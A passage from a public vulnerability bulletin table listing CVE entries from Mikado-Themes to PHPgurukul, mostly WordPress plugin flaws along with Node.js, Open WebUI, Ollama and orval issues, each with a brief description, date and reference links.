| Mikado-Themes--Rosebud | Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Rosebud rosebud allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Rosebud: from n/a through <= 1.4. | 2026-01-23 | not yet calculated | CVE-2026-24631 | https://patchstack.com/database/Wordpress/Theme/rosebud/vulnerability/wordpress-rosebud-theme-1-4-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Mikado-Themes--Verdure | Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Verdure verdure allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Verdure: from n/a through <= 1.6. | 2026-01-22 | not yet calculated | CVE-2026-22430 | https://patchstack.com/database/Wordpress/Theme/verdure/vulnerability/wordpress-verdure-theme-1-6-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Mikado-Themes--Wanderland | Missing Authorization vulnerability in Mikado-Themes Wanderland wanderland allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Wanderland: from n/a through <= 1.5. | 2026-01-22 | not yet calculated | CVE-2026-22458 | https://patchstack.com/database/Wordpress/Theme/wanderland/vulnerability/wordpress-wanderland-theme-1-5-broken-access-control-vulnerability?_s_id=cve |
| Milner--ImageDirector Capture | The use of a hard-coded encryption key in calls to the Password function in C2SGlobalSettings.dll in Milner ImageDirector Capture on Windows allows a local attacker to decrypt database credentials by reading the cryptographic key from the executable. This issue affects ImageDirector Capture: from 7.0.9 before 7.6.3.25808. | 2026-01-20 | not yet calculated | CVE-2025-58740 | https://sra.io/advisories |
| Milner--ImageDirector Capture | Insufficiently Protected Credentials vulnerability in the Credential Field of Milner ImageDirector Capture allows retrieval of credential material and enables database access. This issue affects ImageDirector Capture: from 7.0.9 through 7.6.3.25808. | 2026-01-20 | not yet calculated | CVE-2025-58741 | https://sra.io/advisories |
| Milner--ImageDirector Capture | Insufficiently Protected Credentials, Improper Restriction of Communication Channel to Intended Endpoints vulnerability in the Connection Settings dialog in Milner ImageDirector Capture on Windows allows Adversary in the Middle (AiTM) by modifying the 'Server' field to redirect client authentication. This issue affects ImageDirector Capture: from 7.0.9 before 7.6.3.25808. | 2026-01-20 | not yet calculated | CVE-2025-58742 | https://sra.io/advisories |
| Milner--ImageDirector Capture | Use of a Broken or Risky Cryptographic Algorithm (DES) vulnerability in the Password class in C2SConnections.dll in Milner ImageDirector Capture on Windows allows Encryption Brute Forcing to obtain database credentials. This issue affects ImageDirector Capture: from 7.0.9.0 before 7.6.3.25808. | 2026-01-20 | not yet calculated | CVE-2025-58743 | https://sra.io/advisories |
| Milner--ImageDirector Capture | Use of Default Credentials, Hard-coded Credentials vulnerability in C2SGlobalSettings.dll in Milner ImageDirector Capture on Windows allows decryption of document archive files using credentials decrypted with hard-coded application encryption key. This issue affects ImageDirector Capture: from 7.0.9.0 before 7.6.3.25808. | 2026-01-20 | not yet calculated | CVE-2025-58744 | https://sra.io/advisories |
| miniserve--miniserve | A TOCTOU and symlink race in svenstaro/miniserve 0.32.0 upload finalization (when uploads are enabled) can allow an attacker to overwrite arbitrary files outside the intended upload/document root in deployments where the attacker can create/replace filesystem entries in the upload destination directory (e.g., shared writable directory/volume). | 2026-01-23 | not yet calculated | CVE-2025-67124 | https://github.com/svenstaro/miniserve https://gist.github.com/thesmartshadow/55688f87f8b985eb530e07d00ef8c63f |
| mkscripts--Download After Email | Missing Authorization vulnerability in mkscripts Download After Email download-after-email allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Download After Email: from n/a through <= 2.1.9. | 2026-01-23 | not yet calculated | CVE-2026-24541 | https://patchstack.com/database/Wordpress/Plugin/download-after-email/vulnerability/wordpress-download-after-email-plugin-2-1-9-broken-access-control-vulnerability?_s_id=cve |
| mndpsingh287--WP Mail | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in mndpsingh287 WP Mail wp-mail allows Reflected XSS. This issue affects WP Mail: from n/a through <= 1.3. | 2026-01-22 | not yet calculated | CVE-2025-68008 | https://patchstack.com/database/Wordpress/Plugin/wp-mail/vulnerability/wordpress-wp-mail-plugin-1-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| monetagwp--Monetag Official Plugin | Missing Authorization vulnerability in monetagwp Monetag Official Plugin monetag-official allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Monetag Official Plugin: from n/a through <= 1.1.3. | 2026-01-23 | not yet calculated | CVE-2026-24551 | https://patchstack.com/database/Wordpress/Plugin/monetag-official/vulnerability/wordpress-monetag-official-plugin-plugin-1-1-3-broken-access-control-vulnerability-2?_s_id=cve |
| mwtemplates--DeepDigital | Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in mwtemplates DeepDigital deepdigital allows Code Injection. This issue affects DeepDigital: from n/a through <= 1.0.2. | 2026-01-22 | not yet calculated | CVE-2026-22469 | https://patchstack.com/database/Wordpress/Theme/deepdigital/vulnerability/wordpress-deepdigital-theme-1-0-2-arbitrary-shortcode-execution-vulnerability?_s_id=cve |
| MyThemeShop--WP Subscribe | Missing Authorization vulnerability in MyThemeShop WP Subscribe wp-subscribe allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Subscribe: from n/a through <= 1.2.16. | 2026-01-23 | not yet calculated | CVE-2026-24522 | https://patchstack.com/database/Wordpress/Plugin/wp-subscribe/vulnerability/wordpress-wp-subscribe-plugin-1-2-16-broken-access-control-vulnerability?_s_id=cve |
| Nelio Software--Nelio AB Testing | Improper Control of Generation of Code ('Code Injection') vulnerability in Nelio Software Nelio AB Testing nelio-ab-testing allows Code Injection. This issue affects Nelio AB Testing: from n/a through <= 8.1.8. | 2026-01-22 | not yet calculated | CVE-2025-67944 | https://patchstack.com/database/Wordpress/Plugin/nelio-ab-testing/vulnerability/wordpress-nelio-ab-testing-plugin-8-1-8-arbitrary-code-execution-vulnerability?_s_id=cve |
| Nelio Software--Nelio Content | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Nelio Software Nelio Content nelio-content allows Blind SQL Injection. This issue affects Nelio Content: from n/a through <= 4.1.0. | 2026-01-23 | not yet calculated | CVE-2026-24572 | https://patchstack.com/database/Wordpress/Plugin/nelio-content/vulnerability/wordpress-nelio-content-plugin-4-1-0-sql-injection-vulnerability?_s_id=cve |
| neo4j--Enterprise Edition | Neo4j Enterprise edition versions prior to 2025.11.2 and 5.26.17 are vulnerable to a potential information disclosure by an attacker who has some legitimate access to the database. The vulnerability allows attacker without read access to a property to infer information about its value by trying to enumerate all possible values through observing error messages of SET property. We recommend upgrading to 2025.11.2 or 5.26.17 and above, where the issues is fixed. | 2026-01-22 | not yet calculated | CVE-2025-12738 | https://neo4j.com/security/CVE-2025-12738 |
| nerves-hub--nerves_hub_web | NervesHub is a web service that allows users to manage over-the-air (OTA) firmware updates of devices in the field. A vulnerability present starting in version 1.0.0 and prior to version 2.3.0 allowed attackers to brute-force user API tokens due to the predictable format of previously issued tokens. Tokens included user-identifiable components and were not cryptographically secure, making them susceptible to guessing or enumeration. The vulnerability could have allowed unauthorized access to user accounts or API actions protected by these tokens. A fix is available in version 2.3.0 of NervesHub. This version introduces strong, cryptographically-random tokens using `:crypto.strong_rand_bytes/1`, hashing of tokens before database storage to prevent misuse even if the database is compromised, and context-aware token storage to distinguish between session and API tokens. There are no practical workarounds for this issue other than upgrading. In sensitive environments, as a temporary mitigation, firewalling access to the NervesHub server can help limit exposure until an upgrade is possible. | 2026-01-22 | not yet calculated | CVE-2025-64097 | https://github.com/nerves-hub/nerves_hub_web/security/advisories/GHSA-m9vj-776q-vc8m https://github.com/nerves-hub/nerves_hub_web/pull/2024 https://github.com/nerves-hub/nerves_hub_web/releases/tag/v2.3.0 |
| netgsm--Netgsm | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in netgsm Netgsm netgsm allows Reflected XSS. This issue affects Netgsm: from n/a through <= 2.9.63. | 2026-01-22 | not yet calculated | CVE-2025-68010 | https://patchstack.com/database/Wordpress/Plugin/netgsm/vulnerability/wordpress-netgsm-plugin-2-9-62-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| NewPlane--open5GS | Open 5GS WebUI uses a hard-coded JWT signing key (change-me) whenever the environment variable JWT_SECRET_KEY is unset | 2026-01-20 | not yet calculated | CVE-2026-0622 | https://github.com/open5gs/open5gs/issues/2264 https://github.com/open5gs/open5gs/issues/856 https://github.com/open5gs/open5gs/pull/857 |
| Ninetheme--Anarkali | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Ninetheme Anarkali anarkali allows PHP Local File Inclusion. This issue affects Anarkali: from n/a through <= 1.0.9. | 2026-01-22 | not yet calculated | CVE-2025-47474 | https://patchstack.com/database/Wordpress/Theme/anarkali/vulnerability/wordpress-anarkali-theme-1-0-9-local-file-inclusion-vulnerability?_s_id=cve |
| Ninetheme--Electron | Missing Authorization vulnerability in Ninetheme Electron electron allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Electron: from n/a through <= 1.8.2. | 2026-01-22 | not yet calculated | CVE-2025-5805 | https://patchstack.com/database/Wordpress/Theme/electron/vulnerability/wordpress-electron-theme-1-8-2-broken-access-control-vulnerability?_s_id=cve |
| Ninja Team--GDPR CCPA Compliance Support | Missing Authorization vulnerability in Ninja Team GDPR CCPA Compliance Support ninja-gdpr-compliance allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects GDPR CCPA Compliance Support: from n/a through <= 2.7.4. | 2026-01-22 | not yet calculated | CVE-2025-68073 | https://patchstack.com/database/Wordpress/Plugin/ninja-gdpr-compliance/vulnerability/wordpress-gdpr-ccpa-compliance-support-plugin-2-7-4-broken-access-control-vulnerability?_s_id=cve |
| NixOS--nixpkgs | Tandoor Recipes is a recipe manager than can be installed with the Nix package manager. Starting in version 23.05 and prior to version 26.05, when using the default configuration of Tandoor Recipes, specifically using SQLite and default `MEDIA_ROOT`, the full database file may be externally accessible, potentially on the Internet. The root cause is that the NixOS module configures the working directory of Tandoor Recipes, as well as the value of `MEDIA_ROOT`, to be `/var/lib/tandoor-recipes`. This causes Tandoor Recipes to create its `db.sqlite3` database file in the same directory as `MEDIA_ROOT` causing it to be accessible without authentication through HTTP like any other media file. This is the case when using `GUNICORN_MEDIA=1` or when using a web server like nginx to serve media files. NixOS 26.05 changes the default value of `MEDIA_ROOT` to a sub folder of the data directory. This only applies to configurations with `system.stateVersion` >= 26.05. For older configurations, one of the workarounds should be applied instead. NixOS 25.11 has received a backport of this patch, though it doesn't fix this vulnerability without user intervention. A recommended workaround is to move `MEDIA_ROOT` into a subdirectory. Non-recommended workarounds include switching to PostgreSQL or disallowing access to `db.sqlite3`. | 2026-01-19 | not yet calculated | CVE-2026-23838 | https://github.com/NixOS/nixpkgs/security/advisories/GHSA-g8w3-p77x-mmxh https://github.com/NixOS/nixpkgs/issues/338339 https://github.com/NixOS/nixpkgs/pull/427845 https://github.com/NixOS/nixpkgs/pull/481140 |
| noCreativity--Dooodl | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in noCreativity Dooodl dooodl allows Reflected XSS. This issue affects Dooodl: from n/a through <= 2.3.0. | 2026-01-22 | not yet calculated | CVE-2025-68871 | https://patchstack.com/database/Wordpress/Plugin/dooodl/vulnerability/wordpress-dooodl-plugin-2-3-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| nodejs--node | A flaw in Node.js's Permissions model allows attackers to bypass `--allow-fs-read` and `--allow-fs-write` restrictions using crafted relative symlink paths. By chaining directories and symlinks, a script granted access only to the current directory can escape the allowed path and read sensitive files. This breaks the expected isolation guarantees and enables arbitrary file read/write, leading to potential system compromise. This vulnerability affects users of the permission model on Node.js v20, v22, v24, and v25. | 2026-01-20 | not yet calculated | CVE-2025-55130 | https://nodejs.org/en/blog/vulnerability/december-2025-security-releases |
| nodejs--node | A flaw in Node.js's buffer allocation logic can expose uninitialized memory when allocations are interrupted, when using the `vm` module with the timeout option. Under specific timing conditions, buffers allocated with `Buffer.alloc` and other `TypedArray` instances like `Uint8Array` may contain leftover data from previous operations, allowing in-process secrets like tokens or passwords to leak or causing data corruption. While exploitation typically requires precise timing or in-process code execution, it can become remotely exploitable when untrusted input influences workload and timeouts, leading to potential confidentiality and integrity impact. | 2026-01-20 | not yet calculated | CVE-2025-55131 | https://nodejs.org/en/blog/vulnerability/december-2025-security-releases |
| nodejs--node | A flaw in Node.js's permission model allows a file's access and modification timestamps to be changed via `futimes()` even when the process has only read permissions. Unlike `utimes()`, `futimes()` does not apply the expected write-permission checks, which means file metadata can be modified in read-only directories. This behavior could be used to alter timestamps in ways that obscure activity, reducing the reliability of logs. This vulnerability affects users of the permission model on Node.js v20, v22, v24, and v25. | 2026-01-20 | not yet calculated | CVE-2025-55132 | https://nodejs.org/en/blog/vulnerability/december-2025-security-releases |
| nodejs--node | A memory leak in Node.js's OpenSSL integration occurs when converting `X.509` certificate fields to UTF-8 without freeing the allocated buffer. When applications call `socket.getPeerCertificate(true)`, each certificate field leaks memory, allowing remote clients to trigger steady memory growth through repeated TLS connections. Over time this can lead to resource exhaustion and denial of service. | 2026-01-20 | not yet calculated | CVE-2025-59464 | https://nodejs.org/en/blog/vulnerability/december-2025-security-releases |
| nodejs--node | A malformed `HTTP/2 HEADERS` frame with oversized, invalid `HPACK` data can cause Node.js to crash by triggering an unhandled `TLSSocket` error `ECONNRESET`. Instead of safely closing the connection, the process crashes, enabling a remote denial of service. This primarily affects applications that do not attach explicit error handlers to secure sockets, for example: ``` server.on('secureConnection', socket => { socket.on('error', err => { console.log(err) }) }) ``` | 2026-01-20 | not yet calculated | CVE-2025-59465 | https://nodejs.org/en/blog/vulnerability/december-2025-security-releases |
| nodejs--node | We have identified a bug in Node.js error handling where "Maximum call stack size exceeded" errors become uncatchable when `async_hooks.createHook()` is enabled. Instead of reaching `process.on('uncaughtException')`, the process terminates, making the crash unrecoverable. Applications that rely on `AsyncLocalStorage` (v22, v20) or `async_hooks.createHook()` (v24, v22, v20) become vulnerable to denial-of-service crashes triggered by deep recursion under specific conditions. | 2026-01-20 | not yet calculated | CVE-2025-59466 | https://nodejs.org/en/blog/vulnerability/december-2025-security-releases |
| nodejs--node | A flaw in Node.js's permission model allows Unix Domain Socket (UDS) connections to bypass network restrictions when `--permission` is enabled. Even without `--allow-net`, attacker-controlled inputs (such as URLs or socketPath options) can connect to arbitrary local sockets via net, tls, or undici/fetch. This breaks the intended security boundary of the permission model and enables access to privileged local services, potentially leading to privilege escalation, data exposure, or local code execution. * The issue affects users of the Node.js permission model on version v25. In the moment of this vulnerability, network permissions (`--allow-net`) are still in the experimental phase. | 2026-01-20 | not yet calculated | CVE-2026-21636 | https://nodejs.org/en/blog/vulnerability/december-2025-security-releases |
| nodejs--node | A flaw in Node.js TLS error handling allows remote attackers to crash or exhaust resources of a TLS server when `pskCallback` or `ALPNCallback` are in use. Synchronous exceptions thrown during these callbacks bypass standard TLS error handling paths (tlsClientError and error), causing either immediate process termination or silent file descriptor leaks that eventually lead to denial of service. Because these callbacks process attacker-controlled input during the TLS handshake, a remote client can repeatedly trigger the issue. This vulnerability affects TLS servers using PSK or ALPN callbacks across Node.js versions where these callbacks throw without being safely wrapped. | 2026-01-20 | not yet calculated | CVE-2026-21637 | https://nodejs.org/en/blog/vulnerability/december-2025-security-releases |
| npm--cli | npm cli Incorrect Permission Assignment Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of npm cli. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the handling of modules. The application loads modules from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of a target user. Was ZDI-CAN-25430. | 2026-01-23 | not yet calculated | CVE-2026-0775 | ZDI-26-043 |
| NSquared--Simply Schedule Appointments | Missing Authorization vulnerability in NSquared Simply Schedule Appointments simply-schedule-appointments allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Simply Schedule Appointments: from n/a through <= 1.6.9.15. | 2026-01-22 | not yet calculated | CVE-2025-69315 | https://patchstack.com/database/Wordpress/Plugin/simply-schedule-appointments/vulnerability/wordpress-simply-schedule-appointments-plugin-1-6-9-15-broken-access-control-vulnerability?_s_id=cve |
| Ollama MCP Server--Ollama MCP Server | Ollama MCP Server execAsync Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ollama MCP Server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the execAsync method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-27683. | 2026-01-23 | not yet calculated | CVE-2025-15063 | ZDI-26-020 |
| ollama--ollama | An issue in ollama v.0.12.10 allows a remote attacker to cause a denial of service via the GGUF decoder | 2026-01-21 | not yet calculated | CVE-2025-66959 | https://github.com/ollama/ollama/issues/9820 https://zero.shotlearni.ng/blog/cve-2025-66959panic-dos-via-unchecked-length-in-gguf-decoder-copy/ |
| ollama-ollama | An issue in ollama v.0.12.10 allows a remote attacker to cause a denial of service via the fs/ggml/gguf.go, function readGGUFV1String reads a string length from untrusted GGUF metadata | 2026-01-21 | not yet calculated | CVE-2025-66960 | https://github.com/ollama/ollama/issues/9820 https://zero.shotlearni.ng/blog/cve-2025-66960guf-v1-string-length-cause-panic-in-readggufv1string/ |
| OmniApp--OmniApp | An unauthenticated information disclosure vulnerability in Newgen OmniApp allows attackers to enumerate valid privileged usernames via a publicly accessible client-side JavaScript resource. | 2026-01-23 | not yet calculated | CVE-2025-69908 | https://newgensoft.com/ https://github.com/CBx216/CVE-Newgen-Software-Advisories/blob/main/CVE-2025-69908.md |
| OmniDocs--OmniDocs | An unauthenticated information disclosure vulnerability exists in Newgen OmniDocs due to missing authentication and access control on the /omnidocs/GetListofCabinet API endpoint. A remote attacker can access this endpoint without valid credentials to retrieve sensitive internal configuration information, including cabinet names and database-related metadata. This allows unauthorized enumeration of backend deployment details and may facilitate further targeted attacks. | 2026-01-23 | not yet calculated | CVE-2025-69907 | https://newgensoft.com/ https://github.com/CBx216/CVE-Newgen-Software-Advisories/blob/main/CVE-2025-69907.md |
| omnipressteam--Omnipress | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in omnipressteam Omnipress omnipress allows PHP Local File Inclusion. This issue affects Omnipress: from n/a through <= 1.6.6. | 2026-01-23 | not yet calculated | CVE-2026-24538 | https://patchstack.com/database/Wordpress/Plugin/omnipress/vulnerability/wordpress-omnipress-plugin-1-6-6-local-file-inclusion-vulnerability?_s_id=cve |
| Onepay Sri Lanka--onepay Payment Gateway For WooCommerce | Missing Authorization vulnerability in Onepay Sri Lanka onepay Payment Gateway For WooCommerce onepay-payment-gateway-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects onepay Payment Gateway For WooCommerce: from n/a through <= 1.1.2. | 2026-01-22 | not yet calculated | CVE-2025-68016 | https://patchstack.com/database/Wordpress/Plugin/onepay-payment-gateway-for-woocommerce/vulnerability/wordpress-onepay-payment-gateway-for-woocommerce-plugin-1-1-2-other-vulnerability-type-vulnerability?_s_id=cve |
| Open WebUI--Open WebUI | Open WebUI PIP install_frontmatter_requirements Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Open WebUI. Authentication is required to exploit this vulnerability. The specific flaw exists within the install_frontmatter_requirements function.The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-28258. | 2026-01-23 | not yet calculated | CVE-2026-0765 | ZDI-26-031 |
| Open WebUI--Open WebUI | Open WebUI load_tool_module_by_id Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Open WebUI. Authentication is required to exploit this vulnerability. The specific flaw exists within the load_tool_module_by_id function. The issue results from the lack of proper validation of a user-supplied string before using it to execute Python code. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-28257. | 2026-01-23 | not yet calculated | CVE-2026-0766 | ZDI-26-032 |
| Open WebUI--Open WebUI | Open WebUI Cleartext Transmission of Credentials Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Open WebUI. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of credentials provided to the endpoint. The issue results from transmitting sensitive information in plaintext. An attacker can leverage this vulnerability to disclose transmitted credentials, leading to further compromise. Was ZDI-CAN-28259. | 2026-01-23 | not yet calculated | CVE-2026-0767 | ZDI-26-033 |
| OpenSolution--Quick.Cart | Quick.Cart is vulnerable to reflected XSS via the sSort parameter. An attacker can craft a malicious URL which, when opened, results in arbitrary JavaScript execution in the victim's browser. The vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 6.7 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable. | 2026-01-22 | not yet calculated | CVE-2025-67683 | https://cert.pl/posts/2026/01/CVE-2025-67683 https://opensolution.org/sklep-internetowy-quick-cart.html |
| OpenSolution--Quick.Cart | Quick.Cart is vulnerable to Local File Inclusion and Path Traversal issues in the theme selection mechanism. Quick.Cart allows a privileged user to upload arbitrary file contents while only validating the filename extension. This allows an attacker to include and execute uploaded PHP code, resulting in Remote Code Execution on the server. The vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 6.7 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable. | 2026-01-22 | not yet calculated | CVE-2025-67684 | https://cert.pl/posts/2026/01/CVE-2025-67683 https://opensolution.org/sklep-internetowy-quick-cart.html |
| orjson--orjson | The orjson.dumps function in orjson thru 3.11.4 does not limit recursion for deeply nested JSON documents. | 2026-01-22 | not yet calculated | CVE-2025-67221 | https://github.com/kpatsakis/orjson_vulnerability https://github.com/ijl/orjson |
| orval-labs--orval | Orval generates type-safe JS clients (TypeScript) from any valid OpenAPI v3 or Swagger v2 specification. Versions prior to 7.19.0 until 8.0.2 are vulnerable to arbitrary code execution in environments consuming generated clients. This issue is similar in nature to CVE-2026-22785, but affects a different code path in @orval/core that was not addressed by CVE-2026-22785's fix. The vulnerability allows untrusted OpenAPI specifications to inject arbitrary TypeScript/JavaScript code into generated clients via the x-enumDescriptions field, which is embedded without proper escaping in getEnumImplementation(). I have confirmed that the injection occurs during const enum generation and results in executable code within the generated schema files. Orval 7.19.0 and 8.0.2 contain a fix for the issue. | 2026-01-20 | not yet calculated | CVE-2026-23947 | https://github.com/orval-labs/orval/security/advisories/GHSA-h526-wf6g-67jv https://github.com/orval-labs/orval/releases/tag/v8.0.2 |
| orval-labs--orval | Orval generates type-safe JS clients (TypeScript) from any valid OpenAPI v3 or Swagger v2 specification. Versions 7.19.0 and below and 8.0.0-rc.0 through 8.0.2 allow untrusted OpenAPI specifications to inject arbitrary TypeScript/JavaScript into generated mock files via the const keyword on schema properties. These const values are interpolated into the mock scalar generator (getMockScalar in packages/mock/src/faker/getters/scalar.ts) without proper escaping or type-safe serialization, which results in attacker-controlled code being emitted into both interface definitions and faker/MSW handlers. The vulnerability is similar in impact to the previously reported enum x-enumDescriptions (GHSA-h526-wf6g-67jv), but it affects a different code path in the faker-based mock generator rather than @orval/core. The issue has been fixed in versions 7.20.0 and 8.0.3. | 2026-01-22 | not yet calculated | CVE-2026-24132 | https://github.com/orval-labs/orval/security/advisories/GHSA-f456-rf33-4626 https://github.com/orval-labs/orval/pull/2828 https://github.com/orval-labs/orval/pull/2829 https://github.com/orval-labs/orval/pull/2830 https://github.com/orval-labs/orval/commit/44ca8c1f5f930a3e4cefb6b79b38bcde7f8532a5 https://github.com/orval-labs/orval/commit/6d8ece07ccb80693ad43edabccb3957aceadcd06 https://github.com/orval-labs/orval/commit/9b211cddc9f009f8a671e4ac5c6cb72cd8646b62 https://github.com/orval-labs/orval/releases/tag/v7.20.0 https://github.com/orval-labs/orval/releases/tag/v8.0.3 |
| ovatheme--Athens | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ovatheme Athens athens allows PHP Local File Inclusion. This issue affects Athens: from n/a through <= 1.1.6. | 2026-01-22 | not yet calculated | CVE-2025-49994 | https://patchstack.com/database/Wordpress/Theme/athens/vulnerability/wordpress-athens-theme-1-1-6-local-file-inclusion-vulnerability?_s_id=cve |
| ovatheme--Movie Booking | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in ovatheme Movie Booking movie-booking allows Path Traversal. This issue affects Movie Booking: from n/a through <= 1.1.5. | 2026-01-22 | not yet calculated | CVE-2025-67963 | https://patchstack.com/database/Wordpress/Plugin/movie-booking/vulnerability/wordpress-movie-booking-plugin-1-1-5-arbitrary-file-deletion-vulnerability?_s_id=cve |
| owntone--owntone | A NULL pointer dereference in the parse_meta function (src/httpd_daap.c) of owntone-server commit 334beb allows attackers to cause a Denial of Service (DoS) via sending a crafted DAAP request to the server. | 2026-01-20 | not yet calculated | CVE-2025-63647 | https://github.com/archersec/poc/tree/master/owntone-server https://github.com/owntone/owntone-server/commit/53ee9a3c3921e5448f502800c4dfa787865f6cb7 https://github.com/archersec/security-advisories/blob/master/owntone-server/owntone-server-advisory-2025.md |
| Paolo--GeoDirectory | Cross-Site Request Forgery (CSRF) vulnerability in Paolo GeoDirectory geodirectory allows Cross Site Request Forgery. This issue affects GeoDirectory: from n/a through <= 2.8.147. | 2026-01-23 | not yet calculated | CVE-2026-24549 | https://patchstack.com/database/Wordpress/Plugin/geodirectory/vulnerability/wordpress-geodirectory-plugin-2-8-147-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Passionate Brains--Add Expires Headers & Optimized Minify | Missing Authorization vulnerability in Passionate Brains Add Expires Headers & Optimized Minify add-expires-headers allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Add Expires Headers & Optimized Minify: from n/a through <= 3.1.0. | 2026-01-23 | not yet calculated | CVE-2026-24633 | https://patchstack.com/database/Wordpress/Plugin/add-expires-headers/vulnerability/wordpress-add-expires-headers-optimized-minify-plugin-3-1-0-broken-access-control-vulnerability?_s_id=cve |
| pavothemes--Freshio | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in pavothemes Freshio freshio allows PHP Local File Inclusion. This issue affects Freshio: from n/a through <= 2.4.2. | 2026-01-22 | not yet calculated | CVE-2026-22401 | https://patchstack.com/database/Wordpress/Theme/freshio/vulnerability/wordpress-freshio-theme-2-4-2-local-file-inclusion-vulnerability?_s_id=cve |
| pavothemes--Triply | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in pavothemes Triply triply allows PHP Local File Inclusion. This issue affects Triply: from n/a through <= 2.4.7. | 2026-01-22 | not yet calculated | CVE-2026-22402 | https://patchstack.com/database/Wordpress/Theme/triply/vulnerability/wordpress-triply-theme-2-4-7-local-file-inclusion-vulnerability?_s_id=cve |
| peachpayments--Peach Payments Gateway | Missing Authorization vulnerability in peachpayments Peach Payments Gateway wc-peach-payments-gateway allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Peach Payments Gateway: from n/a through <= 3.3.6. | 2026-01-22 | not yet calculated | CVE-2025-67942 | https://patchstack.com/database/Wordpress/Plugin/wc-peach-payments-gateway/vulnerability/wordpress-peach-payments-gateway-plugin-3-3-6-broken-access-control-vulnerability?_s_id=cve |
| PenciDesign--Penci Pay Writer | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PenciDesign Penci Pay Writer penci-pay-writer allows Stored XSS. This issue affects Penci Pay Writer: from n/a through <= 1.5. | 2026-01-23 | not yet calculated | CVE-2026-24601 | https://patchstack.com/database/Wordpress/Plugin/penci-pay-writer/vulnerability/wordpress-penci-pay-writer-plugin-1-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| PenciDesign--Penci Review | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PenciDesign Penci Review penci-review allows Stored XSS. This issue affects Penci Review: from n/a through <= 3.5. | 2026-01-23 | not yet calculated | CVE-2026-24600 | https://patchstack.com/database/Wordpress/Plugin/penci-review/vulnerability/wordpress-penci-review-plugin-3-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| PenciDesign--Penci Shortcodes & Performance | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PenciDesign Penci Shortcodes & Performance penci-shortcodes allows DOM-Based XSS. This issue affects Penci Shortcodes & Performance: from n/a through <= 6.1. | 2026-01-22 | not yet calculated | CVE-2026-24354 | https://patchstack.com/database/Wordpress/Plugin/penci-shortcodes/vulnerability/wordpress-penci-shortcodes-performance-plugin-6-1-cross-site-scripting-xss-vulnerability-2?_s_id=cve |
| pencilwp--X Addons for Elementor | Missing Authorization vulnerability in pencilwp X Addons for Elementor x-addons-elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects X Addons for Elementor: from n/a through <= 1.0.23. | 2026-01-23 | not yet calculated | CVE-2026-24605 | https://patchstack.com/database/Wordpress/Plugin/x-addons-elementor/vulnerability/wordpress-x-addons-for-elementor-plugin-1-0-23-broken-access-control-vulnerability?_s_id=cve |
| PHPgurukul--PHPgurukul | PHPgurukul Online Course Registration v3.1 lacks Cross-Site Request Forgery (CSRF) protection on all administrative forms. An attacker can perform unauthorized actions on behalf of authenticated administrators by tricking them into visiting a malicious webpage. | 2026-01-22 | not yet calculated | CVE-2025-70899 | https://phpgurukul.com/online-course-registration-free-download/ https://github.com/mathavamoorthi/CVE-2025-70899/blob/main/Missing_CSRF_protection_poc.md |
